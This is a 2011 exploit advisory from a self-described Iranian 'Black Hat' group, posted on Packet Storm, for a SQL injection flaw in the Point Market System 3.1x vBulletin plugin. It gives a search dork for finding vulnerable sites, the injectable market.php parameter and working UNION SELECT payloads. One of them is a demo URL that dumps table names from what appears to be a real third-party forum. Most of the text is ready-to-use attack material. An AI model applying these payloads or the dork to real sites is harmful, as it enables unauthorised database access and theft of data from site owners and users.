Point Market System 3.1x SQL Injection

2011-04-10T00:00:00
ID PACKETSTORM:100255
Type packetstorm
Reporter Net.Edit0r
Modified 2011-04-10T00:00:00

Description

                                        
                                            `#(+)Exploit Title: Point Market System 3.1x vbulletin plugin SQL  
Injection Vulnerability  
#(+)Author : Net.Edit0r  
#(+) E-mail : Black.hat.tm@Gmail.com  
#(+) dork : intext:Point Market System 3.1x  
#(+) Versian : [3.1x]  
#(+) Category : Web Apps [SQl]  
#(+) Platform : Tested on: linux  
#(+) Download plugin : http://www.megaupload.com/?d=2R592KO0  
  
____________________________________________________________________  
____________________________________________________________________  
  
You must register on the site !  
  
The security problem in the file "market.Php" has been created. You  
can disable this security problem Plagn take it away.  
  
[~] Vulnerable File :  
  
# [+]http://localhost.com/market.php?do=cat&id=[SQL]  
  
[~] SQL injection Vulnerability  
  
# [+]-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--  
  
# [+]http://localhost.com/market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--  
  
[~] Demo and Vedio :  
  
http://www.ehoza.com/v4/forum/market.php?do=cat&id=-1+union+select+1,group_concat%28table_name%29,3,4,5,6,@@version,8,9,10,11,12,13+from+information_schema.tables--  
  
Vedio : http://www.multiupload.com/S28Z2FCZQD  
  
[~] Full Info plugin Point Market  
  
http://www.vbulletin.org/forum/showthread.php?p=2159503#post2159503  
  
____________________________________________________________________  
____________________________________________________________________  
  
########################################################################  
(+)IRANIAN Young HackerZ # Persian Gulf  
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &  
3H34N & D3adly #BHG  
(+)Sp My Best Friend : HUrr!c4nE ~ b3hz4d ~ Virangar ~ S3cR3T ~ M4hd1  
~ Mikili ~ P0W3RFU7 ~ Ali.Erroor and all Friends  
(+)Gr33ts to : All Iranian HackerZ  
########################################################################  
`